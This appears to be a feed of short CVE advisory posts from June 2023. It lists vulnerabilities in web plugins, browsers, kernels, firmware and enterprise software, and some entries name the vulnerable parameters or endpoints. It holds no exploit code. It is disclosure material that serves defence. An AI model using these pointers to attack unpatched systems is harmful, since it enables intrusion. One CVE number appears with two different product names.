🚨 CVE-2020-21400SQL injection vulnerability in gaozhifeng PHPMyWind v.5.6 allows a remote attacker to execute arbitrary code via the id variable in the modify function.🎖@cveNotify |
|
| 2023-06-20 16:58:14 |
🚨 CVE-2020-21474File Upload vulnerability in NucleusCMS v.3.71 allows a remote attacker to execute arbitrary code via the /nucleus/plugins/skinfiles/?dir=rsd parameter.🎖@cveNotify |
|
| 2023-06-20 16:58:13 |
🚨 CVE-2020-21485Cross Site Scripting vulnerability in Alluxio v.1.8.1 allows a remote attacker to executea arbitrary code via the path parameter in the browse board component.🎖@cveNotify |
|
| 2023-06-20 16:58:12 |
🚨 CVE-2020-21489File Upload vulnerability in Feehicms v.2.0.8 allows a remote attacker to execute arbitrary code via the /admin/index.php?r=admin-user%2Fupdate-self component.🎖@cveNotify |
|
| 2023-06-20 14:58:20 |
🚨 CVE-2023-33495Craft CMS through 4.4.9 is vulnerable to HTML Injection.🎖@cveNotify |
|
| 2023-06-20 14:58:19 |
🚨 CVE-2023-34596A vulnerability in Aeotec WallMote Switch firmware v2.3 allows attackers to cause a Denial of Service (DoS) via a crafted Z-Wave message.🎖@cveNotify |
|
| 2023-06-20 14:58:18 |
🚨 CVE-2023-34597A vulnerability in Fibaro Motion Sensor firmware v3.4 allows attackers to cause a Denial of Service (DoS) via a crafted Z-Wave message.🎖@cveNotify |
|
| 2023-06-20 14:58:16 |
🚨 CVE-2023-1999There exists a use after free/double free in libwebp. An attacker can use the ApplyFiltersAndEncode() function and loop through to free best.bw and assign best = trial pointer. The second loop will then return 0 because of an Out of memory error in VP8 encoder, the pointer is still assigned to trial and the AddressSanitizer will attempt a double free. 🎖@cveNotify |
|
| 2023-06-20 14:58:15 |
🚨 CVE-2023-35854Zoho ManageEngine ADSelfService Plus through 6113 has an authentication bypass that can be exploited to steal the domain controller session token for identity spoofing, thereby achieving the privileges of the domain controller administrator.🎖@cveNotify |
|
| 2023-06-20 14:58:13 |
🚨 CVE-2023-3337A vulnerability was found in PuneethReddyHC Online Shopping System Advanced 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/reg.php of the component Admin Registration. The manipulation leads to improper authentication. The attack can be launched remotely. The identifier VDB-232009 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-20 10:58:13 |
🚨 CVE-2023-3325The CMS Commander plugin for WordPress is vulnerable to authorization bypass due to the use of an insufficiently unique cryptographic signature on the 'cmsc_add_site' function in versions up to, and including, 2.287. This makes it possible for unauthenticated attackers to the plugin to change the '_cmsc_public_key' in the plugin config, providing access to the plugin's remote control functionalities, such as creating an admin access URL, which can be used for privilege escalation. This can only be exploited if the plugin has not been configured yet, however, if combined with another arbitrary plugin installation and activation vulnerability, the impact can be severe.🎖@cveNotify |
|
| 2023-06-20 05:58:17 |
🚨 CVE-2023-3320The WP Sticky Social plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.1. This is due to missing nonce validation in the ~/admin/views/admin.php file. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-20 05:58:16 |
🚨 CVE-2023-3214Use after free in Autofill payments in Google Chrome prior to 114.0.5735.133 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)🎖@cveNotify |
|
| 2023-06-20 05:58:15 |
🚨 CVE-2023-3215Use after free in WebRTC in Google Chrome prior to 114.0.5735.133 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-06-20 05:58:14 |
🚨 CVE-2023-3216Type confusion in V8 in Google Chrome prior to 114.0.5735.133 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-06-20 05:58:13 |
🚨 CVE-2023-3217Use after free in WebXR in Google Chrome prior to 114.0.5735.133 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-06-19 22:58:13 |
🚨 CVE-2023-29158SUBNET PowerSYSTEM Center versions 2020 U10 and prior are vulnerable to replay attacks which may result in a denial-of-service condition or a loss of data integrity.🎖@cveNotify |
|
| 2023-06-19 22:58:12 |
🚨 CVE-2023-3315Missing permission checks in Jenkins Team Concert Plugin 2.4.1 and earlier allow attackers with Overall/Read permission to check for the existence of an attacker-specified file path on the Jenkins controller file system.🎖@cveNotify |
|
| 2023-06-19 21:58:17 |
🚨 CVE-2023-35843NocoDB through 0.106.0 (or 0.109.1) has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.🎖@cveNotify |
|
| 2023-06-19 21:58:16 |
🚨 CVE-2023-3022A flaw was found in the IPv6 module of the Linux kernel. The arg.result was not used consistently in fib6_rule_lookup, sometimes holding rt6_info and other times fib6_info. This was not accounted for in other parts of the code where rt6_info was expected unconditionally, potentially leading to a kernel panic in fib6_rule_suppress.🎖@cveNotify |
|
| 2023-06-19 21:58:15 |
🚨 CVE-2023-3312A vulnerability was found in drivers/cpufreq/qcom-cpufreq-hw.c in cpufreq subsystem in the Linux Kernel. This flaw, during device unbind will lead to double release problem leading to denial of service.🎖@cveNotify |
|
| 2023-06-19 21:58:14 |
🚨 CVE-2023-34096Thruk is a multibackend monitoring webinterface which currently supports Naemon, Icinga, Shinken and Nagios as backends. In versions 3.06 and prior, the file `panorama.pm` is vulnerable to a Path Traversal vulnerability which allows an attacker to upload a file to any folder which has write permissions on the affected system. The parameter location is not filtered, validated or sanitized and it accepts any kind of characters. For a path traversal attack, the only characters required were the dot (`.`) and the slash (`/`). A fix is available in version 3.06.2.🎖@cveNotify |
|
| 2023-06-19 21:58:13 |
🚨 CVE-2023-2986The Abandoned Cart Lite for WooCommerce plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 5.14.2. This is due to insufficient encryption on the user being supplied during the abandoned cart link decode through the plugin. This allows unauthenticated attackers to log in as users who have abandoned the cart, which users are typically customers.🎖@cveNotify |
|
| 2023-06-19 19:58:35 |
🚨 CVE-2022-48493Configuration defects in the secure OS module.Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2023-06-19 19:58:34 |
🚨 CVE-2022-48495Vulnerability of unauthorized access to foreground app information.Successful exploitation of this vulnerability may cause foreground app information to be obtained.🎖@cveNotify |
|
| 2023-06-19 19:58:33 |
🚨 CVE-2022-48498Configuration defects in the secure OS module.Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2023-06-19 19:58:32 |
🚨 CVE-2022-48499Configuration defects in the secure OS module.Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2023-06-19 19:58:28 |
🚨 CVE-2022-48501Configuration defects in the secure OS module.Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2023-06-19 19:58:27 |
🚨 CVE-2023-34155Vulnerability of unauthorized calling on HUAWEI phones and tablets.Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2023-06-19 19:58:26 |
🚨 CVE-2023-34156Vulnerability of services denied by early fingerprint APIs on HarmonyOS products.Successful exploitation of this vulnerability may cause services to be denied.🎖@cveNotify |
|
| 2023-06-19 19:58:25 |
🚨 CVE-2023-34158Vulnerability of spoofing trustlists of Huawei desktop.Successful exploitation of this vulnerability can cause third-party apps to hide app icons on the desktop to prevent them from being uninstalled.🎖@cveNotify |
|
| 2023-06-19 19:58:21 |
🚨 CVE-2023-34160Vulnerability of spoofing trustlists of Huawei desktop.Successful exploitation of this vulnerability can cause third-party apps to hide app icons on the desktop to prevent them from being uninstalled.🎖@cveNotify |
|
| 2023-06-19 19:58:20 |
🚨 CVE-2023-34161nappropriate authorization vulnerability in the SettingsProvider module.Successful exploitation of this vulnerability may cause features to perform abnormally.🎖@cveNotify |
|
| 2023-06-19 19:58:19 |
🚨 CVE-2022-48486Configuration defects in the secure OS module.Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2023-06-19 19:58:15 |
🚨 CVE-2022-48491Vulnerability of missing authentication on certain HUAWEI phones.Successful exploitation of this vulnerability can lead to ads and other windows to display at any time.🎖@cveNotify |
|
| 2023-06-19 19:58:14 |
🚨 CVE-2022-48506A flawed pseudorandom number generator in Dominion Voting Systems ImageCast Precinct (ICP and ICP2) and ImageCast Evolution (ICE) scanners allows anyone to determine the order in which ballots were cast from public ballot-level data, allowing deanonymization of voted ballots, in several types of scenarios. This issue was observed for use of the following versions of Democracy Suite: 5.2, 5.4-NM, 5.5, 5.5-A, 5.5-B, 5.5-C, 5.5-D, 5.7-A, 5.10, 5.10A, 5.15. NOTE: the Democracy Suite 5.17 EAC Certificate of Conformance mentions "Improved pseudo random number algorithm," which may be relevant.🎖@cveNotify |
|
| 2023-06-19 19:58:13 |
🚨 CVE-2019-2388In affected Ops Manager versions there is an exposed http route was that may allow attackers to view a specific access log of a publicly exposed Ops Manager instance. This issue affects: MongoDB Inc. MongoDB Ops Manager 4.0 versions 4.0.9, 4.0.10 and MongoDB Ops Manager 4.1 version 4.1.5.🎖@cveNotify |
|
| 2023-06-19 19:58:12 |
🚨 CVE-2019-2389Incorrect scoping of kill operations in MongoDB Server's packaged SysV init scripts allow users with write access to the PID file to insert arbitrary PIDs to be killed when the root user stops the MongoDB process via SysV init. This issue affects: MongoDB Inc. MongoDB Server v4.0 versions prior to 4.0.11; v3.6 versions prior to 3.6.14; v3.4 versions prior to 3.4.22.🎖@cveNotify |
|
| 2023-06-19 12:58:31 |
🚨 CVE-2023-2401The QuBot WordPress plugin before 1.1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-06-19 12:58:29 |
🚨 CVE-2023-2492The QueryWall: Plug'n Play Firewall WordPress plugin through 1.1.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.🎖@cveNotify |
|
| 2023-06-19 12:58:28 |
🚨 CVE-2023-2527The Integration for Contact Form 7 and Zoho CRM, Bigin WordPress plugin before 1.2.4 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-06-19 12:58:27 |
🚨 CVE-2023-2654The Conditional Menus WordPress plugin before 1.2.1 does not escape a parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-06-19 12:58:26 |
🚨 CVE-2023-2684The File Renaming on Upload WordPress plugin before 2.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-06-19 12:58:24 |
🚨 CVE-2023-2742The AI ChatBot WordPress plugin before 4.5.5 does not sanitize and escape its settings, allowing high-privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.🎖@cveNotify |
|
| 2023-06-19 12:58:23 |
🚨 CVE-2023-2751The Upload Resume WordPress plugin through 1.2.0 does not validate the captcha parameter when uploading a resume via the resume_upload_form shortcode, allowing unauthenticated visitors to upload arbitrary media files to the site.🎖@cveNotify |
|
| 2023-06-19 12:58:22 |
🚨 CVE-2023-2779The Social Share, Social Login and Social Comments WordPress plugin before 7.13.52 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.🎖@cveNotify |
|
| 2023-06-19 12:58:21 |
🚨 CVE-2023-2805The SupportCandy WordPress plugin before 3.1.7 does not properly sanitise and escape the agents[] parameter in the set_add_agent_leaves AJAX function before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.🎖@cveNotify |
|
| 2023-06-19 12:58:19 |
🚨 CVE-2023-2811The AI ChatBot WordPress plugin before 4.5.6 does not sanitise and escape numerous of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks to all admin when setting chatbot and all client when using chatbot🎖@cveNotify |
|
| 2023-06-19 12:58:18 |
🚨 CVE-2023-2812The Ultimate Dashboard WordPress plugin before 3.7.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-06-19 12:58:17 |
🚨 CVE-2023-2899The Google Map Shortcode WordPress plugin through 3.1.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-06-19 10:58:38 |
🚨 CVE-2023-35005In Apache Airflow, some potentially sensitive values were being shown to the user in certain situations.This vulnerability is mitigated by the fact configuration is not shown in the UI by default (only if `[webserver] expose_config` is set to `non-sensitive-only`), and not all uncensored values are actually sentitive.This issue affects Apache Airflow: from 2.5.0 before 2.6.2. Users are recommended to update to version 2.6.2 or later.🎖@cveNotify |
|
| 2023-06-19 10:58:37 |
🚨 CVE-2023-3311A vulnerability, which was classified as problematic, was found in PuneethReddyHC online-shopping-system-advanced 1.0. This affects an unknown part of the file addsuppliers.php. The manipulation of the argument First name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-231807.🎖@cveNotify |
|
| 2023-06-19 10:58:36 |
🚨 CVE-2023-3309A vulnerability classified as problematic was found in SourceCodester Resort Reservation System 1.0. Affected by this vulnerability is an unknown functionality of the file ?page=rooms of the component Manage Room Page. The manipulation of the argument Cottage Number leads to cross site scripting. The attack can be launched remotely. The identifier VDB-231805 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-19 10:58:35 |
🚨 CVE-2023-34602JeecgBoot up to v 3.5.1 was discovered to contain a SQL injection vulnerability via the component queryTableDictItemsByCode at org.jeecg.modules.api.controller.SystemApiController.🎖@cveNotify |
|
| 2023-06-19 10:58:33 |
🚨 CVE-2023-34603JeecgBoot up to v 3.5.1 was discovered to contain a SQL injection vulnerability via the component queryFilterTableDictInfo at org.jeecg.modules.api.controller.SystemApiController.🎖@cveNotify |
|
| 2023-06-19 10:58:32 |
🚨 CVE-2023-35866In KeePassXC through 2.7.5, a local attacker can make changes to the Database security settings, including master password and second-factor authentication, within an authenticated KeePassXC Database session, without the need to authenticate these changes by entering the password and/or second-factor authentication to confirm changes.🎖@cveNotify |
|
| 2023-06-19 10:58:31 |
🚨 CVE-2023-32276Stack-based buffer overflow vulnerability exists in TELLUS v4.0.15.0 and TELLUS Lite v4.0.15.0. Opening a specially crafted V8 file may lead to information disclosure and/or arbitrary code execution.🎖@cveNotify |
|
| 2023-06-19 10:58:30 |
🚨 CVE-2023-27396FINS (Factory Interface Network Service) is a message communication protocol, which is designed to be used in closed FA (Factory Automation) networks, and is used in FA networks composed of OMRON products. Multiple OMRON products that implement FINS protocol contain following security issues -- (1)Plaintext communication, and (2)No authentication required. When FINS messages are intercepted, the contents may be retrieved. When arbitrary FINS messages are injected, any commands may be executed on, or the system information may be retrieved from, the affected device. Affected products and versions are as follows: SYSMAC CS-series CPU Units, all versions, SYSMAC CJ-series CPU Units, all versions, SYSMAC CP-series CPU Units, all versions, SYSMAC NJ-series CPU Units, all versions, SYSMAC NX1P-series CPU Units, all versions, SYSMAC NX102-series CPU Units, all versions, and SYSMAC NX7 Database Connection CPU Units (Ver.1.16 or later)🎖@cveNotify |
|
| 2023-06-19 10:58:29 |
🚨 CVE-2023-31239Stack-based buffer overflow vulnerability in V-Server v4.0.15.0 and V-Server Lite v4.0.15.0 and earlier allows an attacker to execute arbitrary code by having user open a specially crafted VPR file.🎖@cveNotify |
|
| 2023-06-19 10:58:25 |
🚨 CVE-2023-32288Out-of-bounds read vulnerability exists in TELLUS v4.0.15.0 and TELLUS Lite v4.0.15.0. Opening a specially crafted SIM file may lead to information disclosure and/or arbitrary code execution.🎖@cveNotify |
|
| 2023-06-19 10:58:24 |
🚨 CVE-2023-32542Out-of-bounds read vulnerability exists in TELLUS v4.0.15.0 and TELLUS Lite v4.0.15.0. Opening a specially crafted V8 file may lead to information disclosure and/or arbitrary code execution.🎖@cveNotify |
|
| 2023-06-19 10:58:23 |
🚨 CVE-2023-30759The driver installation package created by Printer Driver Packager NX v1.0.02 to v1.1.25 fails to detect its modification and may spawn an unexpected process with the administrative privilege. If a non-administrative user modifies the driver installation package and runs it on the target PC, an arbitrary program may be executed with the administrative privilege.🎖@cveNotify |
|
| 2023-06-19 10:58:22 |
🚨 CVE-2023-32201Stack-based buffer overflow vulnerability exists in TELLUS v4.0.15.0 and TELLUS Lite v4.0.15.0. Opening a specially crafted SIM2 file may lead to information disclosure and/or arbitrary code execution. This vulnerability is different from CVE-2023-32538 and CVE-2023-32273.🎖@cveNotify |
|
| 2023-06-19 10:58:21 |
🚨 CVE-2023-32270Access of memory location after end of buffer issue exists in TELLUS v4.0.15.0 and TELLUS Lite v4.0.15.0. Opening a specially crafted V8 file may lead to information disclosure and/or arbitrary code execution.🎖@cveNotify |
|
| 2023-06-19 10:58:16 |
🚨 CVE-2023-32538Stack-based buffer overflow vulnerability exists in TELLUS v4.0.15.0 and TELLUS Lite v4.0.15.0. Opening a specially crafted SIM2 file may lead to information disclosure and/or arbitrary code execution. This vulnerability is different from CVE-2023-32273 and CVE-2023-32201.🎖@cveNotify |
|
| 2023-06-19 10:58:15 |
🚨 CVE-2023-34641KioWare for Windows through v8.33 was discovered to contain an incomplete blacklist filter for blocked dialog boxes on Windows 10. This issue can allow attackers to open a file dialog box via the function window.print() which can then be used to open an unprivileged command prompt.🎖@cveNotify |
|
| 2023-06-19 10:58:14 |
🚨 CVE-2023-34642KioWare for Windows through v8.33 was discovered to contain an incomplete blacklist filter for blocked dialog boxes on Windows 10. This issue can allow attackers to open a file dialog box via the function showDirectoryPicker() which can then be used to open an unprivileged command prompt.🎖@cveNotify |
|
| 2023-06-19 10:58:13 |
🚨 CVE-2023-35862libcoap 4.3.1 contains a buffer over-read via the function coap_parse_oscore_conf_mem at coap_oscore.c.🎖@cveNotify |
|
| 2023-06-19 05:58:33 |
🚨 CVE-2023-34657A stored cross-site scripting (XSS) vulnerability in Eyoucms v1.6.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the web_recordnum parameter.🎖@cveNotify |
|
| 2023-06-19 05:58:31 |
🚨 CVE-2023-35852In Suricata before 6.0.13 (when there is an adversary who controls an external source of rules), a dataset filename, that comes from a rule, may trigger absolute or relative directory traversal, and lead to write access to a local filesystem. This is addressed in 6.0.13 by requiring allow-absolute-filenames and allow-write (in the datasets rules configuration section) if an installation requires traversal/writing in this situation.🎖@cveNotify |
|
| 2023-06-19 05:58:29 |
🚨 CVE-2023-35853In Suricata before 6.0.13, an adversary who controls an external source of Lua rules may be able to execute Lua code. This is addressed in 6.0.13 by disabling Lua unless allow-rules is true in the security lua configuration section.🎖@cveNotify |
|
| 2023-06-19 05:58:27 |
🚨 CVE-2023-35855A buffer overflow in Counter-Strike through 8684 allows a game server to execute arbitrary code on a remote client's machine by modifying the lservercfgfile console variable.🎖@cveNotify |
|
| 2023-06-19 05:58:26 |
🚨 CVE-2023-35856A buffer overflow in Nintendo Mario Kart Wii RMCP01, RMCE01, RMCJ01, and RMCK01 can be exploited by a game client to execute arbitrary code on a client's machine via a crafted packet.🎖@cveNotify |
|
| 2023-06-19 05:58:24 |
🚨 CVE-2023-35857In Siren Investigate before 13.2.2, session keys remain active even after logging out.🎖@cveNotify |
|
| 2023-06-19 05:58:22 |
🚨 CVE-2023-35846VirtualSquare picoTCP (aka PicoTCP-NG) through 2.1 does not check the transport layer length in a frame before performing port filtering.🎖@cveNotify |
|
| 2023-06-19 05:58:21 |
🚨 CVE-2023-35847VirtualSquare picoTCP (aka PicoTCP-NG) through 2.1 does not have an MSS lower bound (e.g., it could be zero).🎖@cveNotify |
|
| 2023-06-19 05:58:19 |
🚨 CVE-2023-35848VirtualSquare picoTCP (aka PicoTCP-NG) through 2.1 lacks certain size calculations before attempting to set a value of an mss structure member.🎖@cveNotify |
|
| 2023-06-19 05:58:18 |
🚨 CVE-2023-35849VirtualSquare picoTCP (aka PicoTCP-NG) through 2.1 does not properly check whether header sizes would result in accessing data outside of a packet.🎖@cveNotify |
|
| 2023-06-19 05:58:17 |
🚨 CVE-2023-35844packages/backend/src/routers in Lightdash before 0.510.3 has insecure file endpoints, e.g., they allow .. directory traversal and do not ensure that an intended file extension (.csv or .png) is used.🎖@cveNotify |
|
| 2023-06-19 05:58:16 |
🚨 CVE-2023-35839Solon before 2.3.3 allows Deserialization of Untrusted Data.🎖@cveNotify |
|
| 2023-06-19 05:58:14 |
🚨 CVE-2023-35840_joinPath in elFinderVolumeLocalFileSystem.class.php in elFinder before 2.1.62 allows path traversal in the PHP LocalVolumeDriver connector.🎖@cveNotify |
|
| 2023-06-19 05:58:13 |
🚨 CVE-2023-34096Thruk is a multibackend monitoring webinterface which currently supports Naemon, Icinga, Shinken and Nagios as backends. In versions 3.06 and prior, the file `panorama.pm` is vulnerable to a Path Traversal vulnerability which allows an attacker to upload a file to any folder which has write permissions on the affected system. The parameter location is not filtered, validated or sanitized and it accepts any kind of characters. For a path traversal attack, the only characters required were the dot (`.`) and the slash (`/`). A fix is available in version 3.06.2.🎖@cveNotify |
|
| 2023-06-19 00:58:27 |
🚨 CVE-2023-35825An issue was discovered in the Linux kernel before 6.3.4. A use-after-free was found in r592_remove in drivers/memstick/host/r592.c.🎖@cveNotify |
|
| 2023-06-19 00:58:21 |
🚨 CVE-2023-35826An issue was discovered in the Linux kernel before 6.3.2. A use-after-free was found in cedrus_remove in drivers/staging/media/sunxi/cedrus/cedrus.c.🎖@cveNotify |
|
| 2023-06-19 00:58:20 |
🚨 CVE-2023-35829An issue was discovered in the Linux kernel before 6.3.2. A use-after-free was found in rkvdec_remove in drivers/staging/media/rkvdec/rkvdec.c.🎖@cveNotify |
|
| 2023-06-19 00:58:19 |
🚨 CVE-2023-35823An issue was discovered in the Linux kernel before 6.3.2. A use-after-free was found in saa7134_finidev in drivers/media/pci/saa7134/saa7134-core.c.🎖@cveNotify |
|
| 2023-06-18 21:58:23 |
🚨 CVE-2023-32681Requests is a HTTP library. Since Requests 2.3.0, Requests has been leaking Proxy-Authorization headers to destination servers when redirected to an HTTPS endpoint. This is a product of how we use `rebuild_proxies` to reattach the `Proxy-Authorization` header to requests. For HTTP connections sent through the tunnel, the proxy will identify the header in the request itself and remove it prior to forwarding to the destination server. However when sent over HTTPS, the `Proxy-Authorization` header must be sent in the CONNECT request as the proxy has no visibility into the tunneled request. This results in Requests forwarding proxy credentials to the destination server unintentionally, allowing a malicious actor to potentially exfiltrate sensitive information. This issue has been patched in version 2.31.0.🎖@cveNotify |
|
| 2023-06-18 16:58:21 |
🚨 CVE-2023-3311A vulnerability, which was classified as problematic, was found in SourceCodester Advance Charity Management System 1.0. This affects an unknown part of the file addsuppliers.php. The manipulation of the argument First name leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-231807.🎖@cveNotify |
|
| 2023-06-18 14:58:21 |
🚨 CVE-2023-3310A vulnerability, which was classified as critical, has been found in code-projects Agro-School Management System 1.0. Affected by this issue is some unknown functionality of the file loaddata.php. The manipulation of the argument subject/course leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-231806 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-18 11:58:24 |
🚨 CVE-2023-3308A vulnerability classified as problematic has been found in whaleal IceFrog 1.1.8. Affected is an unknown function of the component Aviator Template Engine. The manipulation leads to deserialization. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231804.🎖@cveNotify |
|
| 2023-06-18 11:58:23 |
🚨 CVE-2023-3307A vulnerability was found in miniCal 1.0.0. It has been rated as critical. This issue affects some unknown processing of the file /booking/show_bookings/. The manipulation of the argument search_query leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-231803. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-06-18 11:58:22 |
🚨 CVE-2023-3305A vulnerability was found in C-DATA Web Management System up to 20230607. It has been classified as critical. This affects an unknown part of the file /cgi-bin/jumpto.php?class=user&page=config_save&isphp=1 of the component User Creation Handler. The manipulation of the argument user/newpassword leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-231801 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-18 05:58:22 |
🚨 CVE-2023-33461iniparser v4.1 is vulnerable to NULL Pointer Dereference in function iniparser_getlongint which misses check NULL for function iniparser_getstring's return.🎖@cveNotify |
|
| 2023-06-18 05:58:21 |
🚨 CVE-2022-4843NULL Pointer Dereference in GitHub repository radareorg/radare2 prior to 5.8.2.🎖@cveNotify |
|
| 2023-06-18 00:58:27 |
🚨 CVE-2023-35813Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3.🎖@cveNotify |
|
| 2023-06-18 00:58:23 |
🚨 CVE-2014-125106Nanopb before 0.3.1 allows size_t overflows in pb_dec_bytes and pb_dec_string.🎖@cveNotify |
|
| 2023-06-18 00:58:22 |
🚨 CVE-2023-35809An issue was discovered in SugarCRM Enterprise before 11.0.6 and 12.x before 12.0.3. A Bean Manipulation vulnerability has been identified in the REST API. By using a crafted request, custom PHP code can be injected through the REST API because of missing input validation. Regular user privileges can be used to exploit this vulnerability. Editions other than Enterprise are also affected.🎖@cveNotify |
|
| 2023-06-18 00:58:21 |
🚨 CVE-2023-35811An issue was discovered in SugarCRM Enterprise before 11.0.6 and 12.x before 12.0.3. Two SQL Injection vectors have been identified in the REST API. By using crafted requests, custom SQL code can be injected through the REST API because of missing input validation. Regular user privileges can use used for exploitation. Editions other than Enterprise are also affected.🎖@cveNotify |
|
| 2023-06-17 11:58:20 |
🚨 CVE-2023-35788An issue was discovered in fl_set_geneve_opt in net/sched/cls_flower.c in the Linux kernel before 6.3.7. It allows an out-of-bounds write in the flower classifier code via TCA_FLOWER_KEY_ENC_OPTS_GENEVE packets. This may result in denial of service or privilege escalation.🎖@cveNotify |
|
| 2023-06-17 05:58:48 |
🚨 CVE-2023-21954Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).🎖@cveNotify |
|
| 2023-06-17 05:58:47 |
🚨 CVE-2023-21967Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-06-17 05:58:45 |
🚨 CVE-2023-21968Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-06-17 05:58:44 |
